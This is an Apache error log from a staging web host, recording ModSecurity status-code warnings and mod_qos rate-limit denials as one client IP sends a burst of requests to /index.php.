[Tue May 26 19:59:35.310938 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PwQAAAPk"]
[Tue May 26 19:59:35.311921 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PyQAAAMw"]
[Tue May 26 19:59:35.316095 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PzgAAAIU"]
[Tue May 26 19:59:35.316136 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxzQAAAFE"]
[Tue May 26 19:59:35.324230 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTUqK9k_ZUB2Vp257tQAAAaY"]
[Tue May 26 19:59:35.328691 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1PzAAAAJQ"]
[Tue May 26 19:59:35.337678 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszxzwAAACo"]
[Tue May 26 19:59:35.343780 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyEAAAACI"]
[Tue May 26 19:59:35.344865 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszx0gAAAG0"]
[Tue May 26 19:59:35.351071 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P4QAAAP0"]
[Tue May 26 19:59:35.355233 2026] [security2:error] [pid 106517:tid 106734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTYZZc2DoU1lPnP1P1wAAANg"]
[Tue May 26 19:59:35.359676 2026] [security2:error] [pid 93868:tid 94384] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTkqK9k_ZUB2Vp2570gAAAg0"]
[Tue May 26 19:59:35.368171 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyDgAAAF8"]
[Tue May 26 19:59:35.374518 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P6AAAAPc"]
[Tue May 26 19:59:35.378457 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTWDRMqfxdEDkoszx0QAAABI"]
[Tue May 26 19:59:35.389476 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P4gAAAJk"]
[Tue May 26 19:59:35.396951 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P7QAAAIw"]
[Tue May 26 19:59:35.399373 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTkqK9k_ZUB2Vp2571gAAAZs"]
[Tue May 26 19:59:35.399833 2026] [security2:error] [pid 106517:tid 106754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P6wAAAOw"]
[Tue May 26 19:59:35.410522 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTkqK9k_ZUB2Vp2576wAAAbg"]
[Tue May 26 19:59:35.417811 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyMwAAAHA"]
[Tue May 26 19:59:35.419786 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QCQAAAO8"]
[Tue May 26 19:59:35.422438 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyMAAAAGE"]
[Tue May 26 19:59:35.430284 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QBQAAALI"]
[Tue May 26 19:59:35.437646 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QBAAAALY"]
[Tue May 26 19:59:35.437913 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyNAAAAC4"]
[Tue May 26 19:59:35.444272 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QBwAAAI8"]
[Tue May 26 19:59:35.445418 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyOwAAAFI"]
[Tue May 26 19:59:35.445559 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QDwAAAM8"]
[Tue May 26 19:59:35.565418 2026] [qos:error] [pid 106517:tid 106758] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuT4ZZc2DoU1lPnP1QTQAAAPA
[Tue May 26 19:59:35.572988 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuT2DRMqfxdEDkoszyfwAAABk
[Tue May 26 19:59:35.573297 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszygAAAAH0
[Tue May 26 19:59:35.580917 2026] [qos:error] [pid 93868:tid 94320] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258IgAAAc0
[Tue May 26 19:59:35.583797 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258IwAAAaQ
[Tue May 26 19:59:35.586014 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258JAAAAZY
[Tue May 26 19:59:35.595747 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszygQAAAFE
[Tue May 26 19:59:35.610849 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258JQAAAa4
[Tue May 26 19:59:35.612282 2026] [qos:error] [pid 93868:tid 94290] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258JgAAAa8
[Tue May 26 19:59:35.614203 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258JwAAAfk
[Tue May 26 19:59:35.720086 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyhQAAADY
[Tue May 26 19:59:35.724972 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyhgAAAAE
[Tue May 26 19:59:35.725612 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyhwAAAB8
[Tue May 26 19:59:35.732972 2026] [qos:error] [pid 93868:tid 94266] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258KQAAAZc
[Tue May 26 19:59:35.734130 2026] [qos:error] [pid 93868:tid 94342] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258KgAAAeM
[Tue May 26 19:59:35.735200 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258KwAAAeE
[Tue May 26 19:59:35.749731 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyiAAAACo
[Tue May 26 19:59:35.762000 2026] [qos:error] [pid 93868:tid 94258] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258LwAAAY8
[Tue May 26 19:59:35.763765 2026] [qos:error] [pid 93868:tid 94324] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258MAAAAdE
[Tue May 26 19:59:35.768175 2026] [qos:error] [pid 93868:tid 94267] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258MQAAAZg
[Tue May 26 19:59:35.874321 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyjQAAAFY
[Tue May 26 19:59:35.877165 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyjgAAAHI
[Tue May 26 19:59:35.877169 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszyjwAAABw
[Tue May 26 19:59:35.880098 2026] [qos:error] [pid 93868:tid 94291] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258MwAAAbA
[Tue May 26 19:59:35.884455 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258NAAAAZM
[Tue May 26 19:59:35.889383 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258NQAAAf8
[Tue May 26 19:59:35.903472 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT2DRMqfxdEDkoszykAAAAD0
[Tue May 26 19:59:35.914275 2026] [qos:error] [pid 93868:tid 94339] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258NgAAAeA
[Tue May 26 19:59:35.914305 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258NwAAAaA
[Tue May 26 19:59:35.922973 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuT0qK9k_ZUB2Vp258OAAAAfA
[Tue May 26 19:59:36.027692 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258OwAAAdw
[Tue May 26 19:59:36.028970 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszykQAAAG8
[Tue May 26 19:59:36.029189 2026] [qos:error] [pid 93576:tid 93755] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszykgAAACs
[Tue May 26 19:59:36.029459 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszykwAAAD8
[Tue May 26 19:59:36.035892 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258PAAAAgQ
[Tue May 26 19:59:36.045286 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258PQAAAfI
[Tue May 26 19:59:36.057348 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszylAAAAAQ
[Tue May 26 19:59:36.065981 2026] [qos:error] [pid 93868:tid 94281] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258PgAAAaY
[Tue May 26 19:59:36.066864 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258PwAAAdU
[Tue May 26 19:59:36.076908 2026] [qos:error] [pid 93868:tid 94284] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258QAAAAak
[Tue May 26 19:59:36.175514 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258QwAAAfM
[Tue May 26 19:59:36.181150 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35372] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszylQAAABI
[Tue May 26 19:59:36.181722 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszylgAAAFg
[Tue May 26 19:59:36.183590 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszylwAAABE
[Tue May 26 19:59:36.187737 2026] [qos:error] [pid 93868:tid 94372] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258RAAAAgE
[Tue May 26 19:59:36.199050 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:34948] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258RgAAAZo
[Tue May 26 19:59:36.211200 2026] [qos:error] [pid 93576:tid 93769] [client 45.148.10.120:35306] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUGDRMqfxdEDkoszymgAAADk
[Tue May 26 19:59:36.217059 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258SQAAAf0
[Tue May 26 19:59:36.217855 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258SgAAAbg
[Tue May 26 19:59:36.231293 2026] [qos:error] [pid 93868:tid 94309] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuUEqK9k_ZUB2Vp258SwAAAcI
[Tue May 26 19:59:36.274112 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1P7AAAAJ0"]
[Tue May 26 19:59:36.279091 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QCAAAANc"]
[Tue May 26 19:59:36.298468 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyOgAAAHM"]
[Tue May 26 19:59:36.303925 2026] [security2:error] [pid 106517:tid 106706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QFQAAALw"]
[Tue May 26 19:59:36.307500 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTmDRMqfxdEDkoszyOQAAAFA"]
[Tue May 26 19:59:36.313075 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuTkqK9k_ZUB2Vp2579wAAAbU"]
[Tue May 26 19:59:36.313652 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QCwAAAIg"]
[Tue May 26 19:59:36.317633 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QFgAAANE"]
[Tue May 26 19:59:36.323321 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QEAAAANk"]
[Tue May 26 19:59:36.325707 2026] [security2:error] [pid 106517:tid 106755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QEgAAAO0"]
[Tue May 26 19:59:36.330840 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuToZZc2DoU1lPnP1QGwAAAL8"]
